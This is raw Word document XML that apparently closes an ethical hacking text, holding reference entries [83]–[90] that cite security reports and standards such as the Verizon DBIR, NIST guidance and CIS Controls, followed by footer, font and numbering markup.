        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:hyperlink r:id="rId86" w:history="1">
        <w:r w:rsidR="00AA0D6C" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.knowbe4.com/phishing-by-industry-benchmarking-report</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="004139A8" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[83]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verizon. "2024 Data Breach Investigations Report</w:t>
      </w:r>
      <w:r w:rsidR="00AA0D6C" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">: Healthcare Sector Analysis." </w:t>
      </w:r>
      <w:r w:rsidR="00AA0D6C" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:hyperlink r:id="rId87" w:history="1">
        <w:r w:rsidR="00AA0D6C" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.verizon.com/business/resources/reports/dbir/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AA0D6C" w:rsidRPr="00C57BFC" w:rsidRDefault="004139A8" w:rsidP="00AA0D6C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[84]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> U.S. Department of Health &amp; Human Services. "HIPAA Secu</w:t>
      </w:r>
      <w:r w:rsidR="00AA0D6C" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">rity Rule." </w:t>
      </w:r>
      <w:r w:rsidR="00AA0D6C" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:hyperlink r:id="rId88" w:history="1">
        <w:r w:rsidR="00AA0D6C" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.hhs.gov/hipaa/for-professionals/security/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="004139A8" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[85]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> International Organization for Standardization. "ISO/IEC 2</w:t>
      </w:r>
      <w:r w:rsidR="00097295" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>7001:2022 Information Security</w:t>
      </w:r>
      <w:r w:rsidR="00097295" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Management." https://www.iso.org/standard/27001</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="004139A8" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[86]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIST. "Framework for Improving Critical Infrastructure Cy</w:t>
      </w:r>
      <w:r w:rsidR="00F26676" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">bersecurity, Version 1.1," Apr </w:t>
      </w:r>
      <w:r w:rsidR="00F26676" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        2018. https://www.nist.gov/cyberframework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F26676" w:rsidRPr="00C57BFC" w:rsidRDefault="004139A8" w:rsidP="00F26676">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[87]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Marsh McLennan. "2024 Cyber Insurance Market Report." </w:t>
      </w:r>
      <w:r w:rsidR="00F26676" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        https://www.marsh.com/us/industries/financial-institutions/insights/cyber-insurance-market-</w:t>
      </w:r>
      <w:r w:rsidR="00F26676" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        trends.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F26676" w:rsidRPr="00C57BFC" w:rsidRDefault="004139A8" w:rsidP="00F26676">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[88]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deloitte. "Measuring the Return from Pharmaceutical Innovation 2023." </w:t>
      </w:r>
      <w:r w:rsidR="00F26676" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        https://www2.deloitte.com/us/en/pages/life-sciences-and-health-care/articles/measuring-</w:t>
      </w:r>
      <w:r w:rsidR="00F26676" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        return-from-pharmaceutical-innovation.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F26676" w:rsidRPr="00C57BFC" w:rsidRDefault="004139A8" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[89]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIST. "SP 800-115: Technical Guide to Information Security Testing and Assessment." </w:t>
      </w:r>
      <w:r w:rsidR="00F26676" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:hyperlink r:id="rId89" w:history="1">
        <w:r w:rsidR="00F26676" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://csrc.nist.gov/publications/detail/sp/800-115/final</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00715FD1" w:rsidRPr="00C57BFC" w:rsidRDefault="004139A8" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[90]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Center for Internet Secur</w:t>
      </w:r>
      <w:r w:rsidR="00F26676" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">ity. "CIS Controls Version 8." </w:t>
      </w:r>
      <w:r w:rsidR="00F26676" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        https://www.cisecurity.org/controls/v8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F4D4B" w:rsidRPr="00C57BFC" w:rsidRDefault="001F4D4B" w:rsidP="001F4D4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001F4D4B" w:rsidRPr="00C57BFC" w:rsidRDefault="001F4D4B" w:rsidP="0024517E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0024517E" w:rsidRPr="00C57BFC" w:rsidRDefault="0024517E" w:rsidP="0024517E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024517E" w:rsidRPr="00C57BFC" w:rsidRDefault="0024517E" w:rsidP="00AD2924">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD2924" w:rsidRPr="00C57BFC" w:rsidRDefault="00AD2924" w:rsidP="00AD2924">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD2924" w:rsidRPr="00C57BFC" w:rsidRDefault="00AD2924" w:rsidP="00AD2924">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD2924" w:rsidRPr="00C57BFC" w:rsidRDefault="00AD2924" w:rsidP="00AD2924">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD2924" w:rsidRPr="00C57BFC" w:rsidRDefault="00AD2924" w:rsidP="00570D0F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00474507" w:rsidRPr="00C57BFC" w:rsidRDefault="00474507" w:rsidP="00474507">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00974533" w:rsidRPr="00C57BFC" w:rsidRDefault="00974533" w:rsidP="008B1983">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w:rsidR="00974533" w:rsidRPr="00C57BFC" w:rsidRDefault="00974533" w:rsidP="008B1983">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00974533" w:rsidRPr="00C57BFC">
      <w:footerReference w:type="default" r:id="rId9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A44ED" w:rsidRDefault="000A44ED" w:rsidP="0007433F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000A44ED" w:rsidRDefault="000A44ED" w:rsidP="000743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Consolas">
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00006FF" w:usb1="0000FCFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Arial Unicode MS">
    <w:altName w:val="Arial"/>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87B68" w:rsidRDefault="00387B68">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Ethical Hacking</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="8496B0" w:themeColor="text2" w:themeTint="99"/>
        <w:spacing w:val="60"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="8496B0" w:themeColor="text2" w:themeTint="99"/>
        <w:spacing w:val="60"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="8496B0" w:themeColor="text2" w:themeTint="99"/>
        <w:spacing w:val="60"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="8496B0" w:themeColor="text2" w:themeTint="99"/>
        <w:spacing w:val="60"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:tab/>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sidR="002008C5">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>4</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sidR="002008C5">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>64</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="00387B68" w:rsidRDefault="00387B68" w:rsidP="00870DC7">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4680"/>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="left" w:pos="3861"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:tab/>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A44ED" w:rsidRDefault="000A44ED" w:rsidP="0007433F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000A44ED" w:rsidRDefault="000A44ED" w:rsidP="000743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EA05DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE2CF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C25F5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4884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1F53F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A78B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622CD2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="466C0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A664E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEB651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54869F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5498B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1B1B53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF382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3A6C15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83665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F0E73CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="341A5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FFD322A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C905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0990951"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2E76D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AA0FCC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8298A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F6A0FE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18E0A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FB40FD2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D08AD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CF64681"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04EC2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9443BAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34FE7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A6051D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA30E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AE13E36"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D100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B0B7786"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30AA6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845802"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0928B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50A7BFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F44E0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69D6E2B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DC8D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72D7D6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77C06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B6673F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="42088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0D618B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00B6BB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99819A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="904E7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9BC67BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="62EEA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A777978"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79540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C603B2D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC12B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CA87AC7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D1AC39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E315ECD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="73528E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ED33E72"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B9DA9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1"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="32">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7"/>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4AA1"/>
    <w:rsid w:val="00007167"/>
    <w:rsid w:val="00011960"/>
    <w:rsid w:val="00020D55"/>
    <w:rsid w:val="0003161B"/>
    <w:rsid w:val="00041909"/>
    <w:rsid w:val="000445EC"/>
    <w:rsid w:val="000477E1"/>
    <w:rsid w:val="00052C7C"/>
    <w:rsid w:val="00067302"/>
    <w:rsid w:val="00071124"/>
    <w:rsid w:val="0007433F"/>
    <w:rsid w:val="00086687"/>
    <w:rsid w:val="00097295"/>
    <w:rsid w:val="000A0A5F"/>
    <w:rsid w:val="000A44ED"/>
    <w:rsid w:val="000C1751"/>
    <w:rsid w:val="000D249D"/>
    <w:rsid w:val="000D2FB1"/>
    <w:rsid w:val="000D34EF"/>
    <w:rsid w:val="000D3DA7"/>
    <w:rsid w:val="000D4691"/>
    <w:rsid w:val="000E6BB4"/>
    <w:rsid w:val="000F5171"/>
    <w:rsid w:val="001272E5"/>
    <w:rsid w:val="00131663"/>
    <w:rsid w:val="00136CCC"/>
    <w:rsid w:val="00143745"/>
    <w:rsid w:val="00143C03"/>
    <w:rsid w:val="00145B7F"/>
    <w:rsid w:val="00151A6E"/>
    <w:rsid w:val="00166AD7"/>
    <w:rsid w:val="00171E3D"/>
    <w:rsid w:val="00181C01"/>
    <w:rsid w:val="0018260E"/>
    <w:rsid w:val="001B2E75"/>
    <w:rsid w:val="001B7B96"/>
    <w:rsid w:val="001C43CB"/>
    <w:rsid w:val="001F4D4B"/>
    <w:rsid w:val="002008C5"/>
    <w:rsid w:val="00206124"/>
    <w:rsid w:val="00213130"/>
    <w:rsid w:val="00220E24"/>
    <w:rsid w:val="00223B85"/>
    <w:rsid w:val="00230D71"/>
    <w:rsid w:val="002322AC"/>
    <w:rsid w:val="00237BB6"/>
    <w:rsid w:val="00242C62"/>
    <w:rsid w:val="0024517E"/>
    <w:rsid w:val="00245CD8"/>
    <w:rsid w:val="00254F6D"/>
    <w:rsid w:val="00273E86"/>
    <w:rsid w:val="002927CB"/>
    <w:rsid w:val="002952B5"/>
    <w:rsid w:val="00296F4F"/>
    <w:rsid w:val="002B57F2"/>
    <w:rsid w:val="002E7766"/>
    <w:rsid w:val="002F1877"/>
    <w:rsid w:val="002F76FE"/>
    <w:rsid w:val="00310B97"/>
    <w:rsid w:val="003135C1"/>
    <w:rsid w:val="003362C9"/>
    <w:rsid w:val="00337459"/>
    <w:rsid w:val="00337600"/>
    <w:rsid w:val="0033774F"/>
    <w:rsid w:val="00346616"/>
    <w:rsid w:val="003468ED"/>
    <w:rsid w:val="00372D62"/>
    <w:rsid w:val="00380874"/>
    <w:rsid w:val="00385C11"/>
    <w:rsid w:val="00385D29"/>
    <w:rsid w:val="00387B68"/>
    <w:rsid w:val="003D1C56"/>
    <w:rsid w:val="003D2A05"/>
    <w:rsid w:val="003E2F7B"/>
    <w:rsid w:val="003E73DE"/>
    <w:rsid w:val="004031B7"/>
    <w:rsid w:val="004139A8"/>
    <w:rsid w:val="00442A9C"/>
    <w:rsid w:val="004466F9"/>
    <w:rsid w:val="0045434C"/>
    <w:rsid w:val="00456098"/>
    <w:rsid w:val="0046210C"/>
    <w:rsid w:val="00462FFB"/>
    <w:rsid w:val="00473DE1"/>
    <w:rsid w:val="00474507"/>
    <w:rsid w:val="004752C6"/>
    <w:rsid w:val="004754C4"/>
    <w:rsid w:val="004C3C2A"/>
    <w:rsid w:val="004C4CD7"/>
    <w:rsid w:val="004C7DFF"/>
    <w:rsid w:val="004D2B19"/>
    <w:rsid w:val="004D4F05"/>
    <w:rsid w:val="004E17A5"/>
    <w:rsid w:val="00501FD3"/>
    <w:rsid w:val="005126D4"/>
    <w:rsid w:val="005129F6"/>
    <w:rsid w:val="00532516"/>
    <w:rsid w:val="00537398"/>
    <w:rsid w:val="0054007D"/>
    <w:rsid w:val="005423C7"/>
    <w:rsid w:val="00570D0F"/>
    <w:rsid w:val="00572421"/>
    <w:rsid w:val="005A2EE2"/>
    <w:rsid w:val="005A7BFF"/>
    <w:rsid w:val="005B01CB"/>
    <w:rsid w:val="005B1FB3"/>
    <w:rsid w:val="005B63D6"/>
    <w:rsid w:val="005C1E66"/>
    <w:rsid w:val="005C603B"/>
    <w:rsid w:val="005C7BA0"/>
    <w:rsid w:val="005D2E7C"/>
    <w:rsid w:val="005E3C55"/>
    <w:rsid w:val="005E47BA"/>
    <w:rsid w:val="005F33B8"/>
    <w:rsid w:val="00613ADA"/>
    <w:rsid w:val="00613C51"/>
    <w:rsid w:val="00624264"/>
    <w:rsid w:val="006317D9"/>
    <w:rsid w:val="00640806"/>
    <w:rsid w:val="00644AA1"/>
    <w:rsid w:val="006467AD"/>
    <w:rsid w:val="00646B85"/>
    <w:rsid w:val="00650F71"/>
    <w:rsid w:val="00653488"/>
    <w:rsid w:val="00660E23"/>
    <w:rsid w:val="00670894"/>
    <w:rsid w:val="00672EBA"/>
    <w:rsid w:val="00675E49"/>
    <w:rsid w:val="00682B01"/>
    <w:rsid w:val="0069464D"/>
    <w:rsid w:val="006A2C33"/>
    <w:rsid w:val="006A72A8"/>
    <w:rsid w:val="006A7E1B"/>
    <w:rsid w:val="006B1FB8"/>
    <w:rsid w:val="006B747B"/>
    <w:rsid w:val="006C0C29"/>
    <w:rsid w:val="006C589F"/>
    <w:rsid w:val="006D1F6F"/>
    <w:rsid w:val="006D29D7"/>
    <w:rsid w:val="006E65C9"/>
    <w:rsid w:val="006F08F8"/>
    <w:rsid w:val="006F179A"/>
    <w:rsid w:val="006F46AC"/>
    <w:rsid w:val="00703FC3"/>
    <w:rsid w:val="0071474C"/>
    <w:rsid w:val="00715FD1"/>
    <w:rsid w:val="007241A0"/>
    <w:rsid w:val="007253A3"/>
    <w:rsid w:val="00745E21"/>
    <w:rsid w:val="00753C79"/>
    <w:rsid w:val="00754118"/>
    <w:rsid w:val="00770E54"/>
    <w:rsid w:val="00777948"/>
    <w:rsid w:val="007818F0"/>
    <w:rsid w:val="00793F32"/>
    <w:rsid w:val="007A331F"/>
    <w:rsid w:val="007B18D9"/>
    <w:rsid w:val="007B37A8"/>
    <w:rsid w:val="007B5BB6"/>
